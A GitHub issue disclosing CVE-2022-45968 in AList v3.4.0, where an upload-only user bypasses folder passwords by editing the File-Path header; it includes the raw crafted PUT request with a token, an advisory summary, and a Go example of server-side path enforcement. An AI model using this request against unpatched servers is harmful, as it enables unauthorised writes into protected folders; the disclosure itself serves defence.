CVE-2022-45968: Upload files to the directory with password Vulnerability(bypass) · Issue #2444 · alist-org/alist

Alist v3.4.0 is vulnerable to File Upload. A user with only file upload permission can upload any file to any folder (even a password protected one).


Please make sure of the following things

  • I have read the documentation.
  • I’m sure there are no duplicate issues or discussions.
  • I’m sure it’s due to alist and not something else (such as Dependencies or Operational).
  • I’m sure I’m using the latest version

Alist Version

v3.4.0

Driver used

Local

Describe the bug

  • A user with only file upload permission can upload any file to any folder (even a password protected one)

Reproduction:

  • Log in as a user who only has the right to upload files

  • You can see that the /testPasswd folder is password protected

  • Go to another folder /test (not protected by password), click on file upload to select the uploaded file and grab the package

![image](https://user-images.githubusercontent.com/52377340/203211925-7ac5b6b8-78e4-4981-bf06-9452fa653e5f.png)

  • Modify the File-Path in the packet to the specified directory (take /testPasswd as an example) and send the packet

  • Enter the password into the folder to find the file uploaded successfully

Reproduction link

Package:

```http
PUT /api/fs/put HTTP/1.1
Host: 192.168.31.148:52000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.31.148:52000/test
Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InRlc3QiLCJleHAiOjE2NjkyNTkxMjksIm5iZiI6MTY2OTA4NjMyOSwiaWF0IjoxNjY5MDg2MzI5fQ.h3RncP5nufF43YURW74yQJYbWhnhIO5SqjTFl7UUXk4
Content-Type: application/octet-stream
File-Path: %2ftestPasswd%2fYZ68QYZdPcaXKdgE3
As-Task: false
Content-Length: 55875
Origin: http://192.168.31.148:52000
Connection: close

[binary PNG data]
```

Logs

No response

Related news

GHSA-4gjr-vgfx-9qvw: AList vulnerable to Improper Preservation of Permissions

Alist v3.4.0 is vulnerable to File Upload. A user with only file upload permission can upload any file to any folder (even a password protected one). Version 3.5.1 contains a patch.
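
One way to enforce the folder password on the upload path, as an added example (not AList's code or its actual patch): the `File-Path` header value is decoded and normalized, and the write is refused when the destination or any ancestor folder is password protected and the caller has neither supplied the password nor holds a bypass permission. `User`, `protected`, `nearestProtected` and `AuthorizeUpload` are hypothetical names, and the folder password is constructed sample data.

```go
package main

import (
	"fmt"
	"net/url"
	"path"
)

// User is a hypothetical stand-in, not an AList type.
type User struct{ CanUpload, CanBypassPassword bool }

// protected maps a folder to its password (constructed sample data).
var protected = map[string]string{"/testPasswd": "s3cret"}

// nearestProtected walks up from dir so sub-folders inherit protection.
func nearestProtected(dir string) (string, bool) {
	for {
		if pw, ok := protected[dir]; ok {
			return pw, true
		}
		if dir == "/" {
			return "", false
		}
		dir = path.Dir(dir)
	}
}

// AuthorizeUpload checks the File-Path header value on the server side.
func AuthorizeUpload(u User, rawFilePath, password string) (string, error) {
	if !u.CanUpload {
		return "", fmt.Errorf("upload not permitted")
	}
	decoded, err := url.PathUnescape(rawFilePath)
	if err != nil {
		return "", fmt.Errorf("bad File-Path: %w", err)
	}
	// Normalize first so "/test/../testPasswd/x" is judged as "/testPasswd/x".
	target := path.Clean("/" + decoded)
	dir := path.Dir(target)
	if pw, ok := nearestProtected(dir); ok && !u.CanBypassPassword && password != pw {
		return "", fmt.Errorf("password required for %s", dir)
	}
	return target, nil
}

func main() {
	_, err := AuthorizeUpload(User{CanUpload: true}, "%2ftestPasswd%2fYZ68QYZdPcaXKdgE3", "")
	fmt.Println("request from the report:", err)
}
```

The decision is made from the header value the server receives, not from the folder the browser was showing, so changing `File-Path` in transit gains nothing.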
